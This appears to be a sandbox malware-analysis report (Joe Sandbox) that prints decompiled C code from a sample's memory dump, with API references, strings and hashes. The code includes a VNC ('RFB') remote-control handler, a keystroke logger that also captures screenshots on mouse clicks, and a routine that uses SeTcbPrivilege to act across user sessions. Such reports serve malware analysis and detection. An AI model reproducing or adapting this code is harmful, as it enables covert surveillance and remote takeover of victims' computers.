								 *((intOrPtr*)(_a8 + 0x10))();
								_v28 = _t508;
								if(_t373 <= _t508) {
									L33:
									if(_a16 != _t508) {
										ReleaseMutex(_a16);
									}
									continue;
									do {
										while(1) {
											L16:
											_t373 = _v8;
											_t508 = 0;
											if(_t373 <= 0) {
												goto L35;
											}
											goto L17;
										}
										L90:
										__eflags =  *(_t504 + 0x1c);
									} while ( *(_t504 + 0x1c) != 0);
									break;
								} else {
									_v24 = _t508;
									_t388 = _t373 * 9;
									do {
										_t525 = _v24 + _v20;
										if( *((short*)(_t525 + 5)) > 0 &&  *((short*)(_t525 + 7)) > 0) {
											_push(_t525);
											_push(_a4);
											_t280 = E00410C08(_t504);
											if(_t280 == 0xffffffff || _t280 == 0) {
												__eflags = _a16;
												if(_a16 != 0) {
													ReleaseMutex(_a16);
												}
												goto L104;
											} else {
												if(_t280 == 1) {
													if(_v28 + 1 != _v8) {
														E00408730(_t525, 9);
													} else {
														_v8 = _v8 - 1;
														_t388 = _t388 - 9;
														E0040861A(_t388,  &_v20);
													}
												}
												goto L31;
											}
										}
										L31:
										_v28 = _v28 + 1;
										_v24 = _v24 + 9;
									} while (_v28 < _v8);
									_t508 = 0;
									goto L33;
								}
								L35:
								_t374 = _a4;
								_t412 = _a4;
								_t256 = E0040B5F4(1, _a4,  &_a15, 0x1b7740);
								__eflags = _t256;
								if(_t256 == 0) {
									goto L104;
								}
								_t260 = _a15 & 0x000000ff;
								__eflags = _t260;
								if(_t260 == 0) {
									_t261 = E0040B63C(_t412, _t374, 3, 0x1b7740);
									__eflags = _t261;
									if(_t261 == 0) {
										goto L104;
									}
									_push(0x1b7740);
									_push( &_v80);
									_t263 = 0x10;
									_t264 = E0040B5F4(_t263, _t374);
									__eflags = _t264;
									if(_t264 == 0) {
										goto L104;
									}
									__eflags = _v80 - 0x20;
									if(_v80 == 0x20) {
										L99:
										__eflags = _v77;
										if(_v77 == 0) {
											goto L104;
										}
										asm("rol word [ebp-0x48], 0x8");
										asm("rol word [ebp-0x46], 0x8");
										asm("rol word [ebp-0x44], 0x8");
										__eflags = _v78;
										_v78 = _t264 & 0xffffff00 | _v78 != 0x00000000;
										_t195 = _t504 + 0x31; // 0x31
										_v77 = 1;
										E004086CB(_t195,  &_v80, 0x10);
										 *(_t504 + 0x41) = _v80 >> 3;
										while(1) {
											L16:
											_t373 = _v8;
											_t508 = 0;
											if(_t373 <= 0) {
												goto L35;
											}
											goto L17;
										}
									}
									__eflags = _v80 - 0x10;
									if(_v80 == 0x10) {
										goto L99;
									}
									__eflags = _v80 - 8;
									if(_v80 != 8) {
										goto L104;
									}
									goto L99;
								}
								_t288 = _t260;
								__eflags = _t288;
								if(_t288 == 0) {
									_t289 = E0040B63C(_t412, _t374, 1, 0x1b7740);
									__eflags = _t289;
									if(_t289 == 0) {
										goto L104;
									}
									_push(0x1b7740);
									_push( &_v32);
									_t291 = 2;
									_t292 = E0040B5F4(_t291, _t374);
									__eflags = _t292;
									if(_t292 == 0) {
										goto L104;
									}
									 *(_t504 + 0x4c) =  *(_t504 + 0x4c) & 0x00000000;
									asm("rol ax, 0x8");
									_t294 = _v32 & 0x0000ffff;
									 *(_t504 + 0x48) = _t294;
									__eflags = _t294;
									if(_t294 <= 0) {
										L89:
										_t295 =  *(_t504 + 0x4c);
										_t488 = (_t295 << 0x00000010 | _t295 & 0x0000ff00) << 0x00000008 | _t295 >> 0x00000008 & 0x0000ff00 |  *(_t504 + 0x4f) & 0x000000ff;
										 *(_t504 + 0x50) = _t488;
										__eflags = _t295 - 5;
										if(_t295 != 5) {
											E0040868F( *(_t504 + 0x1c));
											 *(_t504 + 0x1c) =  *(_t504 + 0x1c) & 0x00000000;
											while(1) {
												L16:
												_t373 = _v8;
												_t508 = 0;
												if(_t373 <= 0) {
													goto L35;
												}
												goto L17;
											}
										}
										goto L90;
									}
									_t376 = (_t294 & 0x0000ffff) << 2;
									_t162 = _t504 + 0x44; // 0x44
									_t516 = _t162;
									_t299 = E0040861A((_t294 & 0x0000ffff) << 2, _t516);
									__eflags = _t299;
									if(_t299 == 0) {
										goto L104;
									}
									_t301 = E0040B5F4(_t376, _a4,  *_t516, 0x1b7740);
									__eflags = _t301;
									if(_t301 == 0) {
										goto L104;
									}
									_v28 = _v28 & 0x00000000;
									__eflags = 0 -  *(_t504 + 0x48);
									if(0 >=  *(_t504 + 0x48)) {
										goto L89;
									}
									_t303 =  *_t516;
									do {
										_t490 = (_v28 & 0x0000ffff) << 2;
										 *(_t490 + _t303) = ( *(_t490 + _t303) << 0x00000010 |  *(_t490 + _t303) & 0x0000ff00) << 0x00000008 | (_t490 + _t303)[0] & 0x000000ff |  *(_t490 + _t303) >> 0x00000008 & 0x0000ff00;
										_t303 =  *((intOrPtr*)(_t504 + 0x44));
										_t423 = 5;
										__eflags =  *(_t490 + _t303) - _t423;
										if( *(_t490 + _t303) == _t423) {
											 *(_t504 + 0x4c) = _t423;
										}
										_v28 = _v28 + 1;
										__eflags = _v28 -  *(_t504 + 0x48);
									} while (_v28 <  *(_t504 + 0x48));
									goto L89;
								}
								_t307 = _t288 - 1;
								__eflags = _t307;
								if(_t307 == 0) {
									_push(0x1b7740);
									_push( &_v56);
									_t309 = 9;
									_t310 = E0040B5F4(_t309, _t374);
									__eflags = _t310;
									if(_t310 == 0) {
										goto L104;
									}
									asm("rol word [ebp-0x33], 0x8");
									asm("rol word [ebp-0x31], 0x8");
									asm("rol word [ebp-0x2f], 0x8");
									asm("rol word [ebp-0x2d], 0x8");
									__eflags = _v56;
									_t380 = 0;
									_v56 = _t310 & 0xffffff00 | _v56 != 0x00000000;
									__eflags = _v8;
									if(_v8 <= 0) {
										L76:
										__eflags = _t380 - _v8;
										if(_t380 != _v8) {
											L78:
											E004086CB(_t380 * 9 + _v20,  &_v56, 9);
											while(1) {
												L16:
												_t373 = _v8;
												_t508 = 0;
												if(_t373 <= 0) {
													goto L35;
												}
												goto L17;
											}
											goto L35;
										}
										_v8 = _v8 + 1;
										_t314 = E0040861A(_v8 * 9,  &_v20);
										__eflags = _t314;
										if(_t314 == 0) {
											goto L104;
										}
										goto L78;
									}
									_t316 = _v20 + 7;
									__eflags = _t316;
									do {
										__eflags =  *(_t316 - 2);
										if( *(_t316 - 2) != 0) {
											goto L75;
										}
										__eflags =  *_t316;
										if( *_t316 == 0) {
											goto L76;
										}
										L75:
										_t380 = _t380 + 1;
										_t316 = _t316 + 9;
										__eflags = _t380 - _v8;
									} while (_t380 < _v8);
									goto L76;
								}
								_t317 = _t307 - 1;
								__eflags = _t317;
								if(_t317 == 0) {
									_push(0x1b7740);
									_push( &_v112);
									_t319 = 7;
									_t320 = E0040B5F4(_t319, _t374);
									__eflags = _t320;
									if(_t320 == 0) {
										goto L104;
									}
									__eflags = _v112;
									_t488 = (_v109 & 0x00ff0000 | _v109 >> 0x00000010) >> 0x00000008 | (_v109 << 0x00000010 | _v109 & 0x0000ff00) << 0x00000008;
									 *((intOrPtr*)(_a8 + 0x14))((_t320 & 0xffffff00 | _v112 != 0x00000000) & 0x000000ff);
									continue;
								}
								_t327 = _t317 - 1;
								__eflags = _t327;
								if(_t327 == 0) {
									_push(0x1b7740);
									_push( &_v16);
									_t329 = 5;
									_t330 = E0040B5F4(_t329, _t374);
									__eflags = _t330;
									if(_t330 == 0) {
										goto L104;
									}
									asm("rol word [ebp-0xb], 0x8");
									asm("rol word [ebp-0x9], 0x8");
									_v24 = _v24 & 0x00000000;
									_t524 = 0x8000;
									_t331 = GetSystemMetrics(0x17);
									__eflags = _t331;
									_t495 = _t488 & 0xffffff00 | _t331 != 0x00000000;
									__eflags = _v15 - _v43;
									if(_v15 != _v43) {
										L50:
										_t524 = 0x8001;
										L51:
										_t333 = _v44;
										_t439 = _v16 & 0x00000001;
										__eflags = _t439 - (_t333 & 0x00000001);
										if(_t439 != (_t333 & 0x00000001)) {
											__eflags = _t439;
											if(_t439 == 0) {
												__eflags = _t495;
												_t458 = ((0 | _t495 == 0x00000000) - 0x00000001 & 0x0000000c) + 4;
												__eflags = _t458;
											} else {
												__eflags = _t495;
												_t458 = ((0 | _t495 == 0x00000000) - 0x00000001 & 0x00000006) + 2;
											}
											_t524 = _t524 | _t458;
											__eflags = _t524;
										}
										_t441 = _v16 & 0x00000004;
										__eflags = _t441 - (_t333 & 0x00000004);
										if(_t441 != (_t333 & 0x00000004)) {
											__eflags = _t441;
											if(_t441 == 0) {
												__eflags = _t495;
												_t449 = ((0 | _t495 == 0x00000000) - 0x00000001 & 0xfffffff4) + 0x10;
												__eflags = _t449;
											} else {
												__eflags = _t495;
												_t449 = ((0 | _t495 == 0x00000000) - 0x00000001 & 0xfffffffa) + 8;
											}
											_t524 = _t524 | _t449;
											__eflags = _t524;
										}
										_t443 = _v16 & 0x00000002;
										__eflags = _t443 - (_t333 & 0x00000002);
										if(_t443 != (_t333 & 0x00000002)) {
											__eflags = _t443;
											_t524 = _t524 | ((0 | _t443 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x00000040;
											__eflags = _t524;
										}
										__eflags = _v16 & 0x00000008;
										if((_v16 & 0x00000008) != 0) {
											_t524 = _t524 | 0x00000800;
											__eflags = _t524;
											_v24 = 0x78;
										}
										__eflags = _v16 & 0x00000010;
										if((_v16 & 0x00000010) != 0) {
											_t524 = _t524 | 0x00000800;
											__eflags = _t524;
											_v24 = 0xffffff88;
										}
										E004086CB( &_v44,  &_v16, 5);
										_t488 = _t524;
										 *((intOrPtr*)(_a8 + 0x18))(_v15 & 0x0000ffff, _v13 & 0x0000ffff, _v24);
										continue;
									}
									__eflags = _v13 - _v41;
									if(_v13 == _v41) {
										goto L51;
									}
									goto L50;
								}
								__eflags = _t327 != 1;
								if(_t327 != 1) {
									goto L104;
								}
								_push(0x1b7740);
								_push( &_v116);
								_t350 = 3;
								_t351 = E0040B5F4(_t350, _t374);
								__eflags = _t351;
								if(_t351 == 0) {
									goto L104;
								}
								_push(0x1b7740);
								_push( &_v64);
								_t353 = 4;
								_t354 = E0040B5F4(_t353, _t374);
								__eflags = _t354;
								if(_t354 == 0) {
									goto L104;
								}
								_v64 = (_v64 & 0x00ff0000 | _v64 >> 0x00000010) >> 0x00000008 | (_v64 << 0x00000010 | _v64 & 0x0000ff00) << 0x00000008;
								_t387 = E0040865F(((_v64 & 0x00ff0000 | _v64 >> 0x00000010) >> 0x00000008 | (_v64 << 0x00000010 | _v64 & 0x0000ff00) << 0x00000008) + 1);
								__eflags = _t387;
								if(_t387 == 0) {
									E0040868F(0);
									goto L104;
								}
								_t364 = E0040B5F4(_v64, _a4, _t387, 0x1b7740);
								__eflags = _t364;
								if(_t364 == 0) {
									goto L104;
								}
								_t488 = _v64;
								 *((intOrPtr*)(_a8 + 0x1c))(_t387);
								E0040868F(_t387);
							}
							_t298 = E0040865F(0x400);
							 *(_t504 + 0x1c) = _t298;
							__eflags = _t298;
						} while (_t298 != 0);
						goto L104;
					}
				}
			}

0x004111a9
0x004111b7
0x004111be
0x00411988
0x00411988
0x00411988
0x004111c7
0x004111cf
0x004111d2
0x004111d3
0x004111da
0x00000000
0x00000000
0x004111e3
0x004111e6
0x004111ee
0x004111f5
0x00000000
0x00000000
0x004111fb
0x004111fe
0x00411206
0x00411225
0x00411232
0x00000000
0x00411238
0x0041123a
0x00411246
0x00411249
0x0041124c
0x00411274
0x0041127b
0x0041127d
0x00411287
0x00411289
0x00411289
0x00411290
0x00411293
0x00000000
0x0041197f
0x00411299
0x0041129a
0x00000000
0x00000000
0x004112ae
0x004112b5
0x00000000
0x00000000
0x004112c4
0x004112c9
0x00000000
0x00000000
0x004112d1
0x004112dc
0x004112df
0x004112e1
0x004112e3
0x00000000
0x00000000
0x004112ef
0x004112f4
0x004112f8
0x00000000
0x00000000
0x0041130b
0x00411318
0x0041132c
0x00411351
0x00411356
0x0041135e
0x00411363
0x00411368
0x0041136d
0x00411382
0x00000000
0x004113a2
0x004113af
0x004113bb
0x004113be
0x004113c2
0x004113d0
0x004113d5
0x004113d8
0x004113d8
0x004113db
0x004113db
0x004113db
0x004113db
0x004113de
0x004113e2
0x00000000
0x00000000
0x004113e8
0x004113f4
0x004113fc
0x00000000
0x00000000
0x00411402
0x0041140d
0x0041195f
0x00411961
0x00000000
0x00411969
0x00411416
0x0041141d
0x0041141d
0x00411428
0x0041142b
0x00411430
0x004114a4
0x004114a7
0x004114b0
0x004114b0
0x00000000
0x004113db
0x004113db
0x004113db
0x004113db
0x004113de
0x004113e2
0x00000000
0x00000000
0x00000000
0x004113e2
0x004118a0
0x004118a0
0x004118a0
0x00000000
0x00411432
0x00411432
0x00411435
0x00411438
0x0041143e
0x00411446
0x0041144f
0x00411450
0x00411455
0x0041145d
0x00411947
0x0041194b
0x00411950
0x00411950
0x00000000
0x0041146b
0x0041146e
0x00411477
0x0041148e
0x00411479
0x00411479
0x0041147c
0x00411484
0x00411484
0x00411477
0x00000000
0x0041146e
0x0041145d
0x00411493
0x00411493
0x00411499
0x0041149d
0x004114a2
0x00000000
0x004114a2
0x004114bb
0x004114bb
0x004114cb
0x004114cd
0x004114d2
0x004114d4
0x00000000
0x00000000
0x004114de
0x004114de
0x004114e1
0x004118d9
0x004118de
0x004118e0
0x00000000
0x00000000
0x004118e2
0x004118e6
0x004118e9
0x004118ec
0x004118f1
0x004118f3
0x00000000
0x00000000
0x004118f5
0x004118f9
0x00411907
0x00411907
0x0041190b
0x00000000
0x00000000
0x0041190d
0x00411912
0x00411917
0x0041191c
0x00411925
0x0041192c
0x00411930
0x00411934
0x0041193f
0x004113db
0x004113db
0x004113db
0x004113de
0x004113e2
0x00000000
0x00000000
0x00000000
0x004113e2
0x004113db
0x004118fb
0x004118ff
0x00000000
0x00000000
0x00411901
0x00411905
0x00000000
0x00000000
0x00000000
0x00411905
0x004114e8
0x004114e8
0x004114e9
0x004117a9
0x004117ae
0x004117b0
0x00000000
0x00000000
0x004117b6
0x004117ba
0x004117bd
0x004117c0
0x004117c5
0x004117c7
0x00000000
0x00000000
0x004117d1
0x004117d5
0x004117d9
0x004117dc
0x004117e0
0x004117e3
0x00411873
0x00411873
0x00411896
0x00411898
0x0041189b
0x0041189e
0x004118c7
0x004118cc
0x004113db
0x004113db
0x004113db
0x004113de
0x004113e2
0x00000000
0x00000000
0x00000000
0x004113e2
0x004113db
0x00000000
0x0041189e
0x004117ec
0x004117ef
0x004117ef
0x004117f4
0x004117f9
0x004117fb
0x00000000
0x00000000
0x0041180d
0x00411812
0x00411814
0x00000000
0x00000000
0x0041181a
0x00411820
0x00411824
0x00000000
0x00000000
0x00411826
0x00411828
0x0041182c
0x00411856
0x00411858
0x0041185d
0x0041185e
0x00411861
0x00411863
0x00411863
0x00411866
0x0041186d
0x0041186d
0x00000000
0x00411828
0x004114ef
0x004114ef
0x004114f0
0x00411718
0x0041171c
0x0041171f
0x00411722
0x00411727
0x00411729
0x00000000
0x00000000
0x0041172f
0x00411734
0x00411739
0x0041173e
0x00411743
0x0041174c
0x0041174e
0x00411751
0x00411754
0x00411770
0x00411770
0x00411773
0x0041178e
0x0041179b
0x004113db
0x004113db
0x004113db
0x004113de
0x004113e2
0x00000000
0x00000000
0x00000000
0x004113e2
0x00000000
0x004113db
0x00411775
0x00411781
0x00411786
0x00411788
0x00000000
0x00000000
0x00000000
0x00411788
0x00411759
0x00411759
0x0041175c
0x0041175c
0x00411760
0x00000000
0x00000000
0x00411762
0x00411765
0x00000000
0x00000000
0x00411767
0x00411767
0x00411768
0x0041176b
0x0041176b
0x00000000
0x0041175c
0x004114f6
0x004114f6
0x004114f7
0x004116c3
0x004116c7
0x004116ca
0x004116cd
0x004116d2
0x004116d4
0x00000000
0x00000000
0x004116da
0x0041170c
0x00411710
0x00000000
0x00411710
0x004114fd
0x004114fd
0x004114fe
0x0041159e
0x004115a2
0x004115a5
0x004115a8
0x004115ad
0x004115af
0x00000000
0x00000000
0x004115b5
0x004115ba
0x004115bf
0x004115c5
0x004115ca
0x004115d0
0x004115d6
0x004115d9
0x004115dd
0x004115e9
0x004115e9
0x004115ee
0x004115ee
0x004115f6
0x004115fc
0x004115fe
0x00411600
0x00411602
0x00411615
0x0041161e
0x0041161e
0x00411604
0x00411606
0x00411610
0x00411610
0x00411621
0x00411621
0x00411621
0x00411628
0x0041162e
0x00411630
0x00411632
0x00411634
0x00411648
0x00411651
0x00411651
0x00411636
0x00411638
0x00411641
0x00411641
0x00411654
0x00411654
0x00411654
0x00411659
0x0041165e
0x00411660
0x00411664
0x00411670
0x00411670
0x00411670
0x00411672
0x00411676
0x00411678
0x00411678
0x0041167e
0x0041167e
0x00411685
0x00411689
0x0041168b
0x0041168b
0x00411691
0x00411691
0x004116a2
0x004116ae
0x004116bb
0x00000000
0x004116bb
0x004115e3
0x004115e7
0x00000000
0x00000000
0x00000000
0x004115e7
0x00411504
0x00411505
0x00000000
0x00000000
0x0041150b
0x0041150f
0x00411512
0x00411515
0x0041151a
0x0041151c
0x00000000
0x00000000
0x00411522
0x00411526
0x00411529
0x0041152c
0x00411531
0x00411533
0x00000000
0x00000000
0x0041155f
0x00411568
0x0041156a
0x0041156c
0x0041195a
0x00000000
0x0041195a
0x0041157a
0x0041157f
0x00411581
0x00000000
0x00000000
0x0041158a
0x00411590
0x00411594
0x00411594
0x004118af
0x004118b4
0x004118b7
0x004118b7
0x00000000
0x004118bf
0x00411382

APIs

Part of subcall function 0040B66B: send.WS2_32(00000004,00000004,00000004,00000000), ref: 0040B679

WSAGetLastError.WS2_32(?,0000012C,00000000,00000031,00000020,00000010,?,001B7740,?,00000003,001B7740,?,001B7740,?,00000000), ref: 00411402
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 0041141D
ReleaseMutex.KERNEL32(00000000,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 004114B0
GetSystemMetrics.USER32 ref: 004115CA

Part of subcall function 0040B5F4: recv.WS2_32(?,?,0000000C,00000000), ref: 0040B618

ReleaseMutex.KERNEL32(00000000,?,00000000,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 00411950

Part of subcall function 0040868F: HeapFree.KERNEL32(00000000,00000000,0040D109,00000000,?,?), ref: 004086A2

Strings

RFB , xrefs: 004111E9
x, xrefs: 0041167E
, xrefs: 004118F5
RFB 003.003, xrefs: 004111AF

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: MutexRelease$ErrorFreeHeapLastMetricsObjectSingleSystemWaitrecvsend
String ID: $RFB $RFB 003.003$x
API String ID: 3911805420-914445781
Opcode ID: 396c94d3bbfb5db5d89ce28d976d2bda5d779aba5df6f41aa5f76c861271d872
Instruction ID: 02c7d2e30e2590e8731a3c6ee8c4019a1afe3781328758a5cc9dc4b569e6f580
Opcode Fuzzy Hash: 396c94d3bbfb5db5d89ce28d976d2bda5d779aba5df6f41aa5f76c861271d872
Instruction Fuzzy Hash: E8323571900209ABDF14DBA4C851BFEB7B5EF44314F04442BEA62F72E2DB788985C798

Uniqueness

Uniqueness Score: -1.00%

Function 0041AFC2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 107
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0041AFC2(MSG* _a4) {
				char _v524;
				char _v780;
				char _v840;
				char _v864;
				short _v884;
				intOrPtr* _v888;
				intOrPtr _v900;
				void* __edi;
				void* __esi;
				int _t25;
				signed int _t27;
				signed int _t32;
				intOrPtr _t39;
				WCHAR* _t44;
				MSG* _t53;
				WCHAR* _t64;
				intOrPtr* _t65;
				signed int _t66;
				void* _t68;

				_t68 = (_t66 & 0xfffffff8) - 0x374;
				_t53 = _a4;
				if(_t53 == 0 || E00419F02() == 0) {
					L20:
					return TranslateMessage(_t53);
				} else {
					_t25 = _t53->message;
					if(_t25 != 0x201) {
						__eflags = _t25 - 0x100;
						if(_t25 != 0x100) {
							goto L20;
						}
						__eflags = _t53->wParam - 0x1b;
						if(_t53->wParam == 0x1b) {
							goto L20;
						}
						_t27 = GetKeyboardState( &_v780);
						__eflags = _t27;
						if(_t27 == 0) {
							goto L20;
						}
						_t32 = ToUnicode(_t53->wParam, _t53->lParam & 0x000000ff,  &_v780,  &_v884, 9, 0);
						__eflags = _t32;
						if(_t32 <= 0) {
							goto L20;
						}
						__eflags = _t32 - 1;
						if(__eflags != 0) {
							if(__eflags > 0) {
								L18:
								__eflags = 0;
								 *((short*)(_t68 + 0x10 + _t32 * 2)) = 0;
								_push( &_v884);
								L19:
								E0041AE24();
								goto L20;
							}
							L17:
							__eflags = _v884 - 0x20;
							if(_v884 < 0x20) {
								goto L20;
							}
							goto L18;
						}
						__eflags = _t53->wParam - 8;
						if(_t53->wParam != 8) {
							goto L17;
						}
						_push(0x4045d0);
						goto L19;
					}
					EnterCriticalSection(0x421da4);
					if( *0x421d9c > 0) {
						 *0x421d9c =  *0x421d9c + 0xffff;
						E00412F05(0xa5,  &_v864);
						_t39 = E00406765( &_v864, 0x1e, 0x1f4);
						_v900 = _t39;
						if(_t39 != 0) {
							E00412F05(0xa3,  &_v840);
							_t64 =  &_v884;
							E00412F05(0xa4, _t64);
							_t44 =  *0x421864;
							if(_t44 != 0) {
								_t64 = _t44;
							}
							E00409450( &_v840, 0x104,  &_v524,  &_v840);
							_t65 = _v888;
							E00413A7C(0x104, _t65,  &_v524);
							 *((intOrPtr*)( *_t65 + 8))(_t65, _t64,  *0x421ad8, GetTickCount());
						}
					}
					LeaveCriticalSection(0x421da4);
					goto L20;
				}
			}

0x0041afc8
0x0041afcf
0x0041afd6
0x0041b11f
0x0041b12c
0x0041afe9
0x0041afe9
0x0041aff1
0x0041b0ae
0x0041b0b3
0x00000000
0x00000000
0x0041b0b5
0x0041b0b9
0x00000000
0x00000000
0x0041b0c0
0x0041b0c6
0x0041b0c8
0x00000000
0x00000000
0x0041b0e8
0x0041b0ee
0x0041b0f0
0x00000000
0x00000000
0x0041b0f2
0x0041b0f5
0x0041b104
0x0041b10e
0x0041b10e
0x0041b110
0x0041b119
0x0041b11a
0x0041b11a
0x00000000
0x0041b11a
0x0041b106
0x0041b106
0x0041b10c
0x00000000
0x00000000
0x00000000
0x0041b10c
0x0041b0f7
0x0041b0fb
0x00000000
0x00000000
0x0041b0fd
0x00000000
0x0041b0fd
0x0041affc
0x0041b00a
0x0041b015
0x0041b025
0x0041b034
0x0041b039
0x0041b03f
0x0041b04a
0x0041b04f
0x0041b058
0x0041b05d
0x0041b064
0x0041b066
0x0041b066
0x0041b087
0x0041b08c
0x0041b096
0x0041b09e
0x0041b09e
0x0041b03f
0x0041b0a6
0x00000000
0x0041b0a6

APIs

TranslateMessage.USER32(?), ref: 0041B120

Part of subcall function 00419F02: WaitForSingleObject.KERNEL32(00000000,0040506D,00405103,00000000), ref: 00419F0A

EnterCriticalSection.KERNEL32(00421DA4), ref: 0041AFFC
LeaveCriticalSection.KERNEL32(00421DA4), ref: 0041B0A6

Part of subcall function 00406765: LoadLibraryA.KERNEL32(gdiplus.dll), ref: 00406797
Part of subcall function 00406765: GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 004067A8
Part of subcall function 00406765: GetProcAddress.KERNEL32(?,GdiplusShutdown), ref: 004067B5
Part of subcall function 00406765: GetProcAddress.KERNEL32(?,GdipCreateBitmapFromHBITMAP), ref: 004067C2
Part of subcall function 00406765: GetProcAddress.KERNEL32(?,GdipDisposeImage), ref: 004067CF
Part of subcall function 00406765: GetProcAddress.KERNEL32(?,GdipGetImageEncodersSize), ref: 004067DC
Part of subcall function 00406765: GetProcAddress.KERNEL32(?,GdipGetImageEncoders), ref: 004067E9
Part of subcall function 00406765: GetProcAddress.KERNEL32(?,GdipSaveImageToStream), ref: 004067F6
Part of subcall function 00406765: LoadLibraryA.KERNEL32(ole32.dll), ref: 0040683E
Part of subcall function 00406765: GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 00406849
Part of subcall function 00406765: LoadLibraryA.KERNEL32(gdi32.dll), ref: 0040685B
Part of subcall function 00406765: GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 00406866
Part of subcall function 00406765: GetProcAddress.KERNEL32(?,CreateCompatibleDC), ref: 00406872
Part of subcall function 00406765: GetProcAddress.KERNEL32(?,CreateCompatibleBitmap), ref: 0040687F
Part of subcall function 00406765: GetProcAddress.KERNEL32(?,GetDeviceCaps), ref: 0040688C
Part of subcall function 00406765: GetProcAddress.KERNEL32(?,SelectObject), ref: 00406899
Part of subcall function 00406765: GetProcAddress.KERNEL32(?,BitBlt), ref: 004068A6
Part of subcall function 00406765: GetProcAddress.KERNEL32(?,DeleteObject), ref: 004068B3

GetTickCount.KERNEL32 ref: 0041B068
GetKeyboardState.USER32(?), ref: 0041B0C0
ToUnicode.USER32 ref: 0041B0E8

Strings

, xrefs: 0041B106

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: AddressProc$LibraryLoad$CriticalSection$CountEnterKeyboardLeaveMessageObjectSingleStateTickTranslateUnicodeWait
String ID:
API String ID: 2762424063-3916222277
Opcode ID: d7e9f2d3ebcce876b6cddb63075fcbf388cd09d831baf468cdd2fb3972a44ddf
Instruction ID: b1a667e5b1653d73ee2ef2a624091738454be2a6223a193ca6f211ccbf527656
Opcode Fuzzy Hash: d7e9f2d3ebcce876b6cddb63075fcbf388cd09d831baf468cdd2fb3972a44ddf
Instruction Fuzzy Hash: DE31D531600301ABDB20AF65DC46ADB77A8EF44740F14443BFA54E72A2D778D985C7AE

Uniqueness

Uniqueness Score: -1.00%

Function 00413E51 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00413E51(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				struct HINSTANCE__* _v8;
				char _v12;
				char _v16;
				_Unknown_base(*)()* _v20;
				intOrPtr _v24;
				char _v40;
				char _v60;
				char _v84;
				char _v112;
				void* __esi;
				struct HINSTANCE__* _t32;
				_Unknown_base(*)()* _t44;
				int _t45;
				intOrPtr _t46;
				intOrPtr _t52;
				intOrPtr* _t57;
				void* _t58;
				intOrPtr* _t59;
				CHAR* _t61;
				CHAR* _t62;
				CHAR* _t63;
				_Unknown_base(*)()* _t64;
				WCHAR* _t65;
				intOrPtr* _t67;

				_t58 = __ecx;
				_t65 =  &_v112;
				E00412F05(0xba, _t65);
				_t32 = LoadLibraryW(_t65);
				_v8 = _t32;
				if(_t32 != 0) {
					_t61 =  &_v84;
					E00412ECF(0xbb, _t61);
					_t57 = GetProcAddress(_v8, _t61);
					_t62 =  &_v40;
					E00412ECF(0xbc, _t62);
					_v20 = GetProcAddress(_v8, _t62);
					_t63 =  &_v60;
					E00412ECF(0xbd, _t63);
					_t44 = GetProcAddress(_v8, _t63);
					_t67 = 0;
					_t64 = _t44;
					if(_t57 == 0 || _v20 == 0 || _t64 == 0) {
						L14:
						_t45 = FreeLibrary(_v8);
						 *((intOrPtr*)(_t64 + 0x5b)) =  *((intOrPtr*)(_t64 + 0x5b)) + _t57;
						return _t45;
					} else {
						_t46 = E00409D62(L"SeTcbPrivilege");
						__imp__WTSGetActiveConsoleSessionId();
						_v24 = _t46;
						if(_t46 != 0xffffffff) {
							E00413DE0(_t58, 0, _t64, _t46, _a4, _a8);
						}
						_push( &_v12);
						_push( &_v16);
						_push(1);
						_push(_t67);
						_push(_t67);
						if( *_t57() == 0) {
							goto L14;
						} else {
							_t57 = 0;
							if(_v12 <= _t67) {
								L13:
								_v20(_v16);
								goto L14;
							} else {
								goto L8;
							}
							do {
								L8:
								_t59 = _t67 + _v16;
								_t52 =  *((intOrPtr*)(_t59 + 8));
								if(_t52 == 0 || _t52 == 4) {
									_t53 =  *_t59;
									if( *_t59 != _v24) {
										E00413DE0(_t59, _t67, _t64, _t53, _a4, _a8);
									}
								}
								_t57 = _t57 + 1;
								_t67 = _t67 + 0xc;
							} while (_t57 < _v12);
							goto L13;
						}
					}
				}
				return _t32;
			}

0x00413e51
0x00413e58
0x00413e60
0x00413e68
0x00413e6e
0x00413e73
0x00413e7b
0x00413e83
0x00413e96
0x00413e98
0x00413ea0
0x00413ead
0x00413eb0
0x00413eb8
0x00413ec3
0x00413ec5
0x00413ec7
0x00413ecb
0x00413f49
0x00413f4c
0x00413f51
0x00000000
0x00413ed6
0x00413edb
0x00413ee0
0x00413ee6
0x00413eec
0x00413ef6
0x00413ef6
0x00413efe
0x00413f02
0x00413f03
0x00413f05
0x00413f06
0x00413f0b
0x00000000
0x00413f0d
0x00413f0d
0x00413f12
0x00413f43
0x00413f46
0x00000000
0x00000000
0x00000000
0x00000000
0x00413f14
0x00413f14
0x00413f17
0x00413f1a
0x00413f1f
0x00413f26
0x00413f2b
0x00413f35
0x00413f35
0x00413f2b
0x00413f3a
0x00413f3b
0x00413f3e
0x00000000
0x00413f14
0x00413f0b
0x00413ecb
0x00413f56

APIs

LoadLibraryW.KERNEL32(?), ref: 00413E68
GetProcAddress.KERNEL32(?,?), ref: 00413E94
GetProcAddress.KERNEL32(?,?), ref: 00413EAB
